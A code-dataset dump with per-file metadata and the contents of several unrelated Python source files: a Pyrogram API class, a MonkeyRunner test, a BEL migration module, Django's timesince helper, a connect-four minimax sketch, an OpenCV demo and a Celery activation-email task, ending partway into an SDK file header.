blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
288
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 684
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 147
values | src_encoding
stringclasses 25
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 128
12.7k
| extension
stringclasses 142
values | content
stringlengths 128
8.19k
| authors
listlengths 1
1
| author_id
stringlengths 1
132
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
e966f04e9525fb6b367303324e44fbcbcfcfae94
|
221b2221703f9cddeee7054c5dc426b81a3f53bd
|
/venv/lib/python3.9/site-packages/pyrogram/raw/functions/langpack/get_language.py
|
e88bc93e119755902d6020efd7ffc9cf8d817575
|
[] |
no_license
|
ch3p4ll3/Royal-Racing-Bot
|
37c998a650078e4b5f5c3b34b8c081d52b018944
|
eab5baf61a9782fbedd42ddf35b7e11cbae9ec22
|
refs/heads/main
| 2023-06-26T03:34:58.104068
| 2021-07-30T17:36:14
| 2021-07-30T17:36:14
| 348,089,837
| 1
| 0
| null | 2021-03-20T11:32:46
| 2021-03-15T18:59:39
|
Python
|
UTF-8
|
Python
| false
| false
| 2,400
|
py
|
# Pyrogram - Telegram MTProto API Client Library for Python
# Copyright (C) 2017-2021 Dan <https://github.com/delivrance>
#
# This file is part of Pyrogram.
#
# Pyrogram is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Pyrogram is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Pyrogram. If not, see <http://www.gnu.org/licenses/>.
from io import BytesIO
from pyrogram.raw.core.primitives import Int, Long, Int128, Int256, Bool, Bytes, String, Double, Vector
from pyrogram.raw.core import TLObject
from pyrogram import raw
from typing import List, Union, Any
# # # # # # # # # # # # # # # # # # # # # # # #
# !!! WARNING !!! #
# This is a generated file! #
# All changes made in this file will be lost! #
# # # # # # # # # # # # # # # # # # # # # # # #
class GetLanguage(TLObject): # type: ignore
"""Telegram API method.
Details:
- Layer: ``122``
- ID: ``0x6a596502``
Parameters:
lang_pack: ``str``
lang_code: ``str``
Returns:
:obj:`LangPackLanguage <pyrogram.raw.base.LangPackLanguage>`
"""
__slots__: List[str] = ["lang_pack", "lang_code"]
ID = 0x6a596502
QUALNAME = "functions.langpack.GetLanguage"
def __init__(self, *, lang_pack: str, lang_code: str) -> None:
self.lang_pack = lang_pack # string
self.lang_code = lang_code # string
@staticmethod
def read(data: BytesIO, *args: Any) -> "GetLanguage":
# No flags
lang_pack = String.read(data)
lang_code = String.read(data)
return GetLanguage(lang_pack=lang_pack, lang_code=lang_code)
def write(self) -> bytes:
data = BytesIO()
data.write(Int(self.ID, False))
# No flags
data.write(String(self.lang_pack))
data.write(String(self.lang_code))
return data.getvalue()
|
[
"slinucs@gmail.com"
] |
slinucs@gmail.com
|
8bcd712f4be349d7fe2b89d4ff19355202af1010
|
b2ba670818623f8ab18162382f7394baed97b7cb
|
/test-data/AndroidSlicer/Chart/DD/8.py
|
09e5ae21e49aeca31e6e629fd56dbf73b0e2b860
|
[
"MIT"
] |
permissive
|
hsumyatwin/ESDroid-artifact
|
012c26c40537a79b255da033e7b36d78086b743a
|
bff082c4daeeed62ceda3d715c07643203a0b44b
|
refs/heads/main
| 2023-04-11T19:17:33.711133
| 2022-09-30T13:40:23
| 2022-09-30T13:40:23
| 303,378,286
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 990
|
py
|
#start monkey test
import os;
from subprocess import Popen
from subprocess import PIPE
from com.android.monkeyrunner import MonkeyRunner, MonkeyDevice, MonkeyImage
from com.android.monkeyrunner.MonkeyDevice import takeSnapshot
from com.android.monkeyrunner.easy import EasyMonkeyDevice
from com.android.monkeyrunner.easy import By
from com.android.chimpchat.hierarchyviewer import HierarchyViewer
from com.android.monkeyrunner import MonkeyView
import random
import sys
import subprocess
from sys import exit
from random import randint
device = MonkeyRunner.waitForConnection()
easy_device=EasyMonkeyDevice(device)
package = 'es.senselesssolutions.gpl.weightchart'
activity ='es.senselesssolutions.gpl.weightchart.ChartActivity'
runComponent = package+'/'+activity
device.startActivity(component=runComponent)
MonkeyRunner.sleep(1)
device.touch(487,1689, 'DOWN_AND_UP')
MonkeyRunner.sleep(1)
device.touch(1619,983, 'DOWN_AND_UP')
MonkeyRunner.sleep(1)
device.touch(558,1730, 'DOWN_AND_UP')
|
[
"hsumyatwin@gmail.com"
] |
hsumyatwin@gmail.com
|
4a2c91451796f219d51b74f12ba3c8156185b68d
|
79041f273c057b2fbb115b35494b13250ac7a42c
|
/bel/lang/migrate_1_2.py
|
a33ee3c88896e423a30211e7b124513032101612
|
[
"Apache-2.0"
] |
permissive
|
belbio/bel
|
3786b65a10d44735407b0e79c8489bea1df58863
|
14ff8e543a679e7dfff3f38f31c0f91ffd55e4d8
|
refs/heads/master
| 2022-12-08T23:02:28.242510
| 2020-12-21T16:17:47
| 2020-12-21T16:17:47
| 116,027,945
| 6
| 2
|
Apache-2.0
| 2022-06-01T23:58:52
| 2018-01-02T15:14:32
|
Python
|
UTF-8
|
Python
| false
| false
| 6,958
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Migrate BEL from 1 to 2.0.0
#
# Standard Library
import json
# Third Party
from loguru import logger
# Local
import bel.belspec.crud
import bel.core.settings as settings
from bel.belspec.crud import get_enhanced_belspec
from bel.lang.ast import BELAst, Function, NSArg, StrArg
from bel.lang.belobj import BEL
version = bel.belspec.crud.get_latest_version()
bo = BEL("", version=version)
belspec = get_enhanced_belspec(bo.version)
def migrate(belstr: str) -> str:
"""Migrate BEL 1 to 2.0.0
Args:
bel: BEL 1
Returns:
bel: BEL 2
"""
bo.parse(belstr)
return migrate_ast(bo.ast).to_string()
def migrate_into_triple(belstr: str) -> str:
"""Migrate BEL1 assertion into BEL 2.0.0 SRO triple"""
bo.parse(belstr)
return migrate_ast(bo.ast).to_triple()
def migrate_ast(ast: BELAst) -> BELAst:
# Process Subject
bo.ast.subject = convert(bo.ast.subject)
if bo.ast.object:
if bo.ast.object.type == "BELAst":
bo.ast.object.subject = convert(bo.ast.object.subject)
if bo.ast.object.object:
bo.ast.object.object = convert(bo.ast.object.object)
else:
bo.ast.object = convert(bo.ast.object)
return bo.ast
def convert(ast):
"""Convert BEL1 AST Function to BEL2 AST Function"""
if ast and ast.type == "Function":
# Activity function conversion
if (
ast.name != "molecularActivity"
and ast.name in belspec["namespaces"]["Activity"]["list"]
):
print("name", ast.name, "type", ast.type)
ast = convert_activity(ast)
return ast # Otherwise - this will trigger on the BEL2 molecularActivity
# translocation conversion
elif ast.name in ["tloc", "translocation"]:
ast = convert_tloc(ast)
fus_flag = False
for idx, arg in enumerate(ast.args):
if arg.__class__.__name__ == "Function":
# Fix substitution -> variation()
if arg.name in ["sub", "substitution"]:
ast.args[idx] = convert_sub(arg)
elif arg.name in ["trunc", "truncation"]:
ast.args[idx] = convert_trunc(arg)
elif arg.name in ["pmod", "proteinModification"]:
ast.args[idx] = convert_pmod(arg)
elif arg.name in ["fus", "fusion"]:
fus_flag = True
# Recursively process Functions
ast.args[idx] = convert(ast.args[idx])
if fus_flag:
ast = convert_fus(ast)
return ast
def convert_tloc(ast):
"""Convert BEL1 tloc() to BEL2"""
from_loc_arg = ast.args[1]
to_loc_arg = ast.args[2]
from_loc = Function("fromLoc", version=version, parent=ast)
from_loc.add_argument(NSArg(from_loc_arg.namespace, from_loc_arg.value, parent=from_loc))
to_loc = Function("toLoc", version=version, parent=ast)
to_loc.add_argument(NSArg(to_loc_arg.namespace, to_loc_arg.value, parent=to_loc))
ast.args[1] = from_loc
ast.args[2] = to_loc
return ast
def convert_activity(ast):
"""Convert BEL1 activities to BEL2 act()"""
if len(ast.args) > 1:
logger.error(f"Activity should not have more than 1 argument {ast.to_string()}")
p_arg = ast.args[0] # protein argument
print("p_arg", p_arg)
ma_arg = Function("ma", version=version)
ma_arg.add_argument(StrArg(ast.name, ma_arg))
p_arg.change_parent_fn(ma_arg)
ast = Function("activity", version=version)
p_arg.change_parent_fn(ast)
ast.add_argument(p_arg)
ast.add_argument(ma_arg)
return ast
def convert_pmod(pmod):
"""Update BEL1 pmod() protein modification term"""
if pmod.args[0].value in belspec["bel1_migration"]["protein_modifications"]:
pmod.args[0].value = belspec["bel1_migration"]["protein_modifications"][pmod.args[0].value]
return pmod
def convert_fus(ast):
"""Convert BEL1 fus() to BEL2 fus()"""
parent_fn_name = ast.name_short
prefix_list = {"p": "p.", "r": "r.", "g": "c."}
prefix = prefix_list[parent_fn_name]
fus1_ns = ast.args[0].namespace
fus1_val = ast.args[0].value
arg_fus = ast.args[1]
fus_args = [None, "?", "?"]
for idx, arg in enumerate(arg_fus.args):
fus_args[idx] = arg
fus2_ns = fus_args[0].namespace
fus2_val = fus_args[0].value
if fus_args[1] == "?":
fus1_range = fus_args[1]
else:
fus1_range = f'"{prefix}1_{fus_args[1].value}"'
if fus_args[2] == "?":
fus2_range = fus_args[2]
else:
fus2_range = f'"{prefix}{fus_args[2].value}_?"'
fus = Function("fus", version=version, parent=ast)
fus.args = [
NSArg(fus1_ns, fus1_val, fus),
StrArg(fus1_range, fus),
NSArg(fus2_ns, fus2_val, fus),
StrArg(fus2_range, fus),
]
# Remove BEL
ast_args = ast.args
ast_args.pop(0)
ast_args.pop(0)
if ast_args == [None]:
ast_args = []
ast.args = []
ast.add_argument(fus)
if len(ast_args) > 0:
ast.args.extend(ast_args)
return ast
def convert_sub(sub):
"""Convert BEL1 sub() to BEL2 var()"""
args = sub.args
(ref_aa, pos, new_aa) = args
parent_fn_name = sub.parent_function.name_short
prefix_list = {"p": "p.", "r": "r.", "g": "c."}
prefix = prefix_list[parent_fn_name]
new_var_arg = f'"{prefix}{belspec["namespaces"]["AminoAcid"]["to_short"][ref_aa.value]}{pos.value}{belspec["namespaces"]["AminoAcid"]["to_short"][new_aa.value]}"'
new_var = Function("var", version=version)
new_var.add_argument(StrArg(new_var_arg, new_var))
return new_var
def convert_trunc(trunc):
"""Convert BEL1 trunc() to BEL2 var()"""
parent_fn_name = trunc.parent_function.name_short
prefix_list = {"p": "p.", "r": "r.", "g": "c."}
prefix = prefix_list[parent_fn_name]
new_var_arg = f'"truncated at {trunc.args[0].value}"'
new_var = Function("var", version=version)
new_var.add_argument(StrArg(new_var_arg, new_var))
return new_var
def main():
# Local
import bel.lang.migrate_1_2
bel1 = "kin(p(HGNC:BRAF))"
bel1 = "p(HGNC:PIK3CA, sub(E, 545, K))"
# bel2 = 'p(HGNC:PIK3CA, var(p.Glu545Lys))'
bel1 = "r(HGNC:BCR, fus(HGNC:JAK2, 1875, 2626), pmod(P))"
bel2 = 'r(fus(HGNC:BCR, "r.1_1875", HGNC:JAK2, "r.2626_?"), pmod(Ph))'
# bel1 = 'p(HGNC:MAPK1, pmod(P, Thr, 185))'
# bel2 = 'p(HGNC:MAPK1, pmod(Ph, Thr, 185))'
# bel1 = 'tloc(p(HGNC:EGFR), MESHCL:Cytoplasm, MESHCL:"Cell Nucleus")'
# bel2 = 'tloc(p(HGNC:EGFR), fromLoc(MESHCL:Cytoplasm), toLoc(MESHCL:"Cell Nucleus"))'
# bel1 = 'p(HGNC:ABCA1, trunc(1851))'
# bel2 = 'p(HGNC:ABCA1, var("truncated at 1851"))'
bel2 = bel.lang.migrate_1_2.migrate(bel1)
print("BEL2", bel2)
if __name__ == "__main__":
main()
|
[
"william.s.hayes@gmail.com"
] |
william.s.hayes@gmail.com
|
206146ddffedd60bf477a416ab75b3c14e9f720f
|
758bf41e46a3093f4923af603f1f7f8063408b9c
|
/website/testFromRemoteRepo/_bsch3398/museum/python/django/utils/timesince.py
|
55e53c65cfc601a4fa7399ed0b4d33d81b8588c3
|
[] |
no_license
|
mpetyx/mpetyx.com
|
4033d97b21c9227a6ba505980fd0c1b57254e8fb
|
d50c379b4fe09e0135656573f7049225fc90ae36
|
refs/heads/master
| 2021-01-10T19:50:15.488371
| 2014-01-22T09:04:14
| 2014-01-22T09:04:14
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,698
|
py
|
import datetime
from django.utils.tzinfo import LocalTimezone
from django.utils.translation import ungettext, ugettext
def timesince(d, now=None):
"""
Takes two datetime objects and returns the time between d and now
as a nicely formatted string, e.g. "10 minutes". If d occurs after now,
then "0 minutes" is returned.
Units used are years, months, weeks, days, hours, and minutes.
Seconds and microseconds are ignored. Up to two adjacent units will be
displayed. For example, "2 weeks, 3 days" and "1 year, 3 months" are
possible outputs, but "2 weeks, 3 hours" and "1 year, 5 days" are not.
Adapted from http://blog.natbat.co.uk/archive/2003/Jun/14/time_since
"""
chunks = (
(60 * 60 * 24 * 365, lambda n: ungettext('year', 'years', n)),
(60 * 60 * 24 * 30, lambda n: ungettext('month', 'months', n)),
(60 * 60 * 24 * 7, lambda n: ungettext('week', 'weeks', n)),
(60 * 60 * 24, lambda n: ungettext('day', 'days', n)),
(60 * 60, lambda n: ungettext('hour', 'hours', n)),
(60, lambda n: ungettext('minute', 'minutes', n))
)
# Convert datetime.date to datetime.datetime for comparison.
if not isinstance(d, datetime.datetime):
d = datetime.datetime(d.year, d.month, d.day)
if now and not isinstance(now, datetime.datetime):
now = datetime.datetime(now.year, now.month, now.day)
if not now:
if d.tzinfo:
now = datetime.datetime.now(LocalTimezone(d))
else:
now = datetime.datetime.now()
# ignore microsecond part of 'd' since we removed it from 'now'
delta = now - (d - datetime.timedelta(0, 0, d.microsecond))
since = delta.days * 24 * 60 * 60 + delta.seconds
if since <= 0:
# d is in the future compared to now, stop processing.
return u'0 ' + ugettext('minutes')
for i, (seconds, name) in enumerate(chunks):
count = since // seconds
if count != 0:
break
s = ugettext('%(number)d %(type)s') % {'number': count, 'type': name(count)}
if i + 1 < len(chunks):
# Now get the second item
seconds2, name2 = chunks[i + 1]
count2 = (since - (seconds * count)) // seconds2
if count2 != 0:
s += ugettext(', %(number)d %(type)s') % {'number': count2, 'type': name2(count2)}
return s
def timeuntil(d, now=None):
"""
Like timesince, but returns a string measuring the time until
the given time.
"""
if not now:
if getattr(d, 'tzinfo', None):
now = datetime.datetime.now(LocalTimezone(d))
else:
now = datetime.datetime.now()
return timesince(now, d)
|
[
"mpetyx@gmail.com"
] |
mpetyx@gmail.com
|
df004da63a64bed312c2d45ad9d337333d93d167
|
2160b580f64693eb8a27afc58dbdff9363247e3f
|
/doc2dash/parsers/__init__.py
|
164faf6c4ec769dfc84c4a88ad42ba11ba703c48
|
[
"MIT"
] |
permissive
|
pombredanne/doc2dash
|
fa65fc4428d03c1be9dbdfdb5b311d37c439c3ae
|
c2f342a74b596d3e0470f9ac69f73c9aef1fc7bd
|
refs/heads/master
| 2021-01-16T19:30:41.265173
| 2014-08-14T08:12:10
| 2014-08-14T08:13:09
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 405
|
py
|
from __future__ import absolute_import, division, print_function
from . import pydoctor, sphinx, intersphinx
DOCTYPES = [
intersphinx.InterSphinxParser,
sphinx.SphinxParser,
pydoctor.PyDoctorParser,
]
def get_doctype(path):
"""
Gets the apropriate doctype for *path*.
"""
for dt in DOCTYPES:
if dt.detect(path):
return dt
else:
return None
|
[
"hs@ox.cx"
] |
hs@ox.cx
|
6cd48226c2b5daa5312ca2232f47327b3926aa63
|
7e6864c5c48317a590ed6cc9b2acb85754bcda3b
|
/app/bin/back_end_scripts/minimax.py
|
7a7839692657faffc8427321758349942d25078c
|
[
"MIT"
] |
permissive
|
michaelneuder/connect_four
|
f83d8c1adf03af14632ab1acb23cc79ea5a3f035
|
de2a1d7296ffddaee4282b722775225cdfbe6304
|
refs/heads/master
| 2021-01-20T10:06:56.505978
| 2017-06-05T23:04:34
| 2017-06-05T23:04:34
| 83,929,928
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,084
|
py
|
#!/usr/bin/env python3
import numpy as np
import random as rand
class minimax(object):
def __init__(self, current_board, move_number):
self.board = current_board
self.number_rows = 6
self.number_cols = 7
self.move_number = move_number
self.right_diag_1 = []
self.right_diag_2 = []
self.right_diag_3 = []
self.right_diag_4 = []
self.right_diag_5 = []
self.right_diag_6 = []
self.left_diag_1 = []
self.left_diag_2 = []
self.left_diag_3 = []
self.left_diag_4 = []
self.left_diag_5 = []
self.left_diag_6 = []
self.diag_set = []
self.two_set = []
self.update_diags()
def update_diags(self):
self.right_diag_1 = [self.board[3,0],self.board[2,1],self.board[1,2],self.board[0,3]]
self.right_diag_2 = [self.board[4,0],self.board[3,1],self.board[2,2],self.board[1,3],
self.board[0,4]]
self.right_diag_3 = [self.board[5,0],self.board[4,1],self.board[3,2],self.board[2,3],
self.board[1,4],self.board[0,5]]
self.right_diag_4 = [self.board[5,1],self.board[4,2],self.board[3,3],self.board[2,4],
self.board[1,5],self.board[0,6]]
self.right_diag_5 = [self.board[5,2],self.board[4,3],self.board[3,4],self.board[2,5],
self.board[1,6]]
self.right_diag_6 = [self.board[5,3],self.board[4,4],self.board[3,5],self.board[2,6]]
self.left_diag_1 = [self.board[3,6],self.board[2,5],self.board[1,4],self.board[0,3]]
self.left_diag_2 = [self.board[4,6],self.board[3,5],self.board[2,4],self.board[1,3],
self.board[0,2]]
self.left_diag_3 = [self.board[5,6],self.board[4,5],self.board[3,4],self.board[2,3],
self.board[1,2],self.board[0,1]]
self.left_diag_4 = [self.board[5,5],self.board[4,4],self.board[3,3],self.board[2,2],
self.board[1,1],self.board[0,0]]
self.left_diag_5 = [self.board[5,4],self.board[4,3],self.board[3,2],self.board[2,1],
self.board[1,0]]
self.left_diag_6 = [self.board[5,3],self.board[4,2],self.board[3,1],self.board[2,0]]
self.diag_set = [self.right_diag_1, self.right_diag_2, self.right_diag_3,
self.right_diag_4, self.right_diag_5, self.right_diag_6,
self.left_diag_1, self.left_diag_2, self.left_diag_3,
self.left_diag_4, self.left_diag_5, self.left_diag_6]
def find_twos_rows(self, color):
number_of_twos = 0
'''
checking for twos along the rows. this gets complicated, because we
only want to count twos that could be part of a future connect four.
thus we have to make sure that their is enough empty cells around each
set of two before we count it.
----------------------------------------------------------------------
these are the options: 0011, 0101, 0110, 1001, 1010, 1100
'''
for row in range(self.number_rows):
for col in range(self.number_cols-1):
if( (col-2) > -1 and (col+2 >= self.number_cols or self.board[row][col+2] != color)):
if(self.board[row][col] == self.board[row][col+1] == color
and self.board[row][col-1] == self.board[row][col-2] == 0):
number_of_twos += 1
elif( (col-1) > -1 and (col+2) < self.number_cols ):
if(self.board[row][col] == self.board[row][col+2] == color
and (self.board[row][col-1] == self.board[row][col+1] == 0)):
number_of_twos += 1
elif( (col-1) > -1 and (col+2) < self.number_cols):
if(self.board[row][col] == self.board[row][col+1] == color
and (self.board[row][col-1] == self.board[row][col+2] == 0)):
number_of_twos += 1
elif( (col+3) < self.number_cols):
if(self.board[row][col] == self.board[row][col+3] == color
and self.board[row][col+1] == self.board[row][col+2] == 0):
number_of_twos += 1
elif(self.board[row][col] == self.board[row][col+2] == color
and self.board[row][col+1] == self.board[row][col+3] == 0):
number_of_twos += 1
elif(self.board[row][col] == self.board[row][col+1] == color
and self.board[row][col+2] == self.board[row][col+3] == 0):
number_of_twos += 1
return number_of_twos
def find_twos_rows_test(self, color):
'''
checking for twos along the rows. this gets complicated, because we
only want to count twos that could be part of a future connect four.
thus we have to make sure that their is enough empty cells around each
set of two before we count it.
----------------------------------------------------------------------
these are the options: 0011, 0101, 0110, 1001, 1010, 1100
'''
number_of_twos = 0
set_to_check = []
for row in range(self.number_rows):
for col in range(self.number_cols-3):
set_to_check.append([self.board[row][col+i] for i in range(4)])
for set_ in set_to_check:
num_color = 0
num_empty = 0
for cell in set_:
if(cell == 0):
num_empty += 1
elif(cell == color):
num_color += 1
if(num_color == num_empty == 2):
number_of_twos += 1
return number_of_twos
def find_twos_cols(self, color):
number_of_twos = 0
'''
checking for twos along the col. this is pretty easy as the only way a
two in a row along a column can be apart of a connect four is if the piece
immediately above the two is empty.
'''
for col in range(self.number_cols):
for row in range(self.number_rows):
if(self.board[row][col] == self.board[row-1][col] == color
and self.board[row-2][col] == 0):
number_of_twos += 1
return number_of_twos
def find_twos_diags(self, color):
'''
this is similar to finding twos in rows. there are three options for
two in a rows that have potential to be a win. 0011, 0110, 1100. these
each are examined in the context of the diagonal. this is the reason
that the diagonal lists are necessary
'''
number_of_twos = 0
for diag in self.diag_set:
diagonal_length = len(diag)
for i in range(diagonal_length-1):
if( (i+3) < diagonal_length):
if(diag[i] == diag[i+1] == color and diag[i+2] == diag[i+3] == 0):
number_of_twos += 1
print('found')
elif( (i-1) > -1 and (i+2) < diagonal_length):
if(diag[i] == diag[i+1] == color and diag[i-1] == diag[i+2] == 0):
number_of_twos += 1
print('found')
elif( (i-2) > -1):
if(diag[i] == diag[i+1] == color and diag[i-1] == diag[i-2] == 0):
number_of_twos += 1
print('found')
return number_of_twos
def evaluate_board(self):
# (2 in a rows)*10 + (3 in a rows)*1000 + (4 in a row)*100000
evaluation = 10
return evaluation
def main():
print("\nminimax ai algorithm --- connect four\n")
sample_board = np.array([[0,0,0,0,0,0,0],
[0,0,0,0,0,0,0],
[0,0,0,0,0,0,0],
[0,0,2,0,1,2,0],
[0,1,2,1,2,2,2],
[2,1,1,2,1,1,1]])
minimax_ = minimax(sample_board, 16)
print(minimax_.find_twos_rows_test(1))
if __name__ == '__main__':
main()
|
[
"michael.neuder@gmail.com"
] |
michael.neuder@gmail.com
|
f69504729af79407f2cc3c37688aedfdbe190a0d
|
1719920a92f7194766624474b98d59ef8d6eddaf
|
/models/device_enrollment_configuration.py
|
9e22612e3cb2ffb4bf77a9608e129ccf5936870e
|
[
"MIT"
] |
permissive
|
MIchaelMainer/msgraph-v10-models-python
|
cfa5e3a65ba675383975a99779763211ed9fa0a9
|
adad66363ebe151be2332f3ef74a664584385748
|
refs/heads/master
| 2020-03-19T12:51:06.370673
| 2018-06-08T00:16:12
| 2018-06-08T00:16:12
| 136,544,573
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,747
|
py
|
# -*- coding: utf-8 -*-
'''
# Copyright (c) Microsoft Corporation. All Rights Reserved. Licensed under the MIT License. See License in the project root for license information.
#
# This file was generated and any changes will be overwritten.
'''
from __future__ import unicode_literals
from ..model.enrollment_configuration_assignment import EnrollmentConfigurationAssignment
from datetime import datetime
from ..one_drive_object_base import OneDriveObjectBase
class DeviceEnrollmentConfiguration(OneDriveObjectBase):
def __init__(self, prop_dict={}):
self._prop_dict = prop_dict
@property
def display_name(self):
"""
Gets and sets the displayName
Returns:
str:
The displayName
"""
if "displayName" in self._prop_dict:
return self._prop_dict["displayName"]
else:
return None
@display_name.setter
def display_name(self, val):
self._prop_dict["displayName"] = val
@property
def description(self):
"""
Gets and sets the description
Returns:
str:
The description
"""
if "description" in self._prop_dict:
return self._prop_dict["description"]
else:
return None
@description.setter
def description(self, val):
self._prop_dict["description"] = val
@property
def priority(self):
"""
Gets and sets the priority
Returns:
int:
The priority
"""
if "priority" in self._prop_dict:
return self._prop_dict["priority"]
else:
return None
@priority.setter
def priority(self, val):
self._prop_dict["priority"] = val
@property
def created_date_time(self):
"""
Gets and sets the createdDateTime
Returns:
datetime:
The createdDateTime
"""
if "createdDateTime" in self._prop_dict:
return datetime.strptime(self._prop_dict["createdDateTime"].replace("Z", ""), "%Y-%m-%dT%H:%M:%S.%f")
else:
return None
@created_date_time.setter
def created_date_time(self, val):
self._prop_dict["createdDateTime"] = val.isoformat()+"Z"
@property
def last_modified_date_time(self):
"""
Gets and sets the lastModifiedDateTime
Returns:
datetime:
The lastModifiedDateTime
"""
if "lastModifiedDateTime" in self._prop_dict:
return datetime.strptime(self._prop_dict["lastModifiedDateTime"].replace("Z", ""), "%Y-%m-%dT%H:%M:%S.%f")
else:
return None
@last_modified_date_time.setter
def last_modified_date_time(self, val):
self._prop_dict["lastModifiedDateTime"] = val.isoformat()+"Z"
@property
def version(self):
"""
Gets and sets the version
Returns:
int:
The version
"""
if "version" in self._prop_dict:
return self._prop_dict["version"]
else:
return None
@version.setter
def version(self, val):
self._prop_dict["version"] = val
@property
def assignments(self):
"""Gets and sets the assignments
Returns:
:class:`AssignmentsCollectionPage<onedrivesdk.request.assignments_collection.AssignmentsCollectionPage>`:
The assignments
"""
if "assignments" in self._prop_dict:
return AssignmentsCollectionPage(self._prop_dict["assignments"])
else:
return None
|
[
"mmainer@microsoft.com"
] |
mmainer@microsoft.com
|
e15ab783b8524095dfce9416304b9b29b70fb815
|
f9357dc6ebe6ae1af0b03a9afc5f765706b8d31f
|
/cv2_functions/cv2_minbox.py
|
9614fc7f0d142f6072a8812d1af97c5d594b277c
|
[] |
no_license
|
cilame/any-whim
|
660acd966048655aa36886047fbc232539807881
|
1520accbe1506a133989a6c2be17572e7fb4693e
|
refs/heads/master
| 2023-08-17T05:10:56.348200
| 2023-08-13T16:45:11
| 2023-08-13T16:45:11
| 110,548,292
| 125
| 64
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 913
|
py
|
import cv2
s = cv2.createBackgroundSubtractorMOG2(varThreshold=100)
f = cv2.VideoCapture(0)
while(1):
a,v = f.read()
g = s.apply(v)
g = cv2.morphologyEx(g,cv2.MORPH_DILATE,(7,7),iterations=7)
a,b,c = cv2.findContours(g,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)
for i in b:
#print cv2.minAreaRect(i)
x1,x2,x3,x4 = cv2.boxPoints(cv2.minAreaRect(i))
if sum((x1-x2)**2)>20 and sum((x2-x3)**2)>20:
x1 = tuple(x1)
x2 = tuple(x2)
x3 = tuple(x3)
x4 = tuple(x4)
cv2.line(v,x1,x2,(0,255,0))
cv2.line(v,x2,x3,(0,255,0))
cv2.line(v,x3,x4,(0,255,0))
cv2.line(v,x4,x1,(0,255,0))
#if w>10 and h>10:cv2.rectangle(v,(x,y),(x+w,y+h),(0,255,0),1)
cv2.imshow('nier1',v)
cv2.imshow('nier',g)
if cv2.waitKey(42)==ord(' '):
break
f.release()
cv2.destroyAllWindows()
|
[
"opaquism@hotmail.com"
] |
opaquism@hotmail.com
|
b58e705deed2f0b8a2254709321b6101b634b952
|
fcc6fa7905b6045a68b992c74e5301e00d5dd3d3
|
/users/tasks.py
|
bf40dc7db3c53264f1f01878dcefd90681f297b2
|
[] |
no_license
|
alinzel/BookStore
|
cc394c9935155c7fda29aa105edd1e9914bd94aa
|
5dfbf13182ce19dfae4d7f8b443cd8e7a54d1204
|
refs/heads/master
| 2020-03-07T03:22:18.771701
| 2018-03-29T08:00:19
| 2018-03-29T08:00:19
| 127,233,714
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 795
|
py
|
from __future__ import absolute_import,unicode_literals
from celery import shared_task
from django.conf import settings
from django.core.mail import send_mail
# 发送激活邮件
@shared_task # 共享任务 返回一个总是使用current_app中的任务实例的代理
def send_active_email(token, username, email):
subject = '尚硅谷书城用户激活链接' # 标题
message = '你好' + username # 内容
sender = settings.EMAIL_FROM # 显示的发件人
receiver = [email] # 目的邮箱
# 激活链接
html_message = '<a href="http://127.0.0.1:8000/user/active/%s/">http://127.0.0.1:8000/user/active/</a>'%token
# 发送邮件的链接
send_mail(subject, message, sender,receiver, html_message=html_message)
# TODO 开启celery的命令
# celery -A bookstore worker -l info
|
[
"944951481@qq.com"
] |
944951481@qq.com
|
230d26e5c2b5c4bc19665857dfe972ec6b36874b
|
b15d2787a1eeb56dfa700480364337216d2b1eb9
|
/accelbyte_py_sdk/api/platform/models/client_request_parameter.py
|
9f7b1f469cdc712522fbd02313e75c9d9297b6f3
|
[
"MIT"
] |
permissive
|
AccelByte/accelbyte-python-sdk
|
dedf3b8a592beef5fcf86b4245678ee3277f953d
|
539c617c7e6938892fa49f95585b2a45c97a59e0
|
refs/heads/main
| 2023-08-24T14:38:04.370340
| 2023-08-22T01:08:03
| 2023-08-22T01:08:03
| 410,735,805
| 2
| 1
|
MIT
| 2022-08-02T03:54:11
| 2021-09-27T04:00:10
|
Python
|
UTF-8
|
Python
| false
| false
| 6,030
|
py
|
# Copyright (c) 2021 AccelByte Inc. All Rights Reserved.
# This is licensed software from AccelByte Inc, for limitations
# and restrictions contact your company contract manager.
#
# Code generated. DO NOT EDIT!
# template file: ags_py_codegen
# AccelByte Gaming Services Platform Service (4.32.1)
# pylint: disable=duplicate-code
# pylint: disable=line-too-long
# pylint: disable=missing-function-docstring
# pylint: disable=missing-module-docstring
# pylint: disable=too-many-arguments
# pylint: disable=too-many-branches
# pylint: disable=too-many-instance-attributes
# pylint: disable=too-many-lines
# pylint: disable=too-many-locals
# pylint: disable=too-many-public-methods
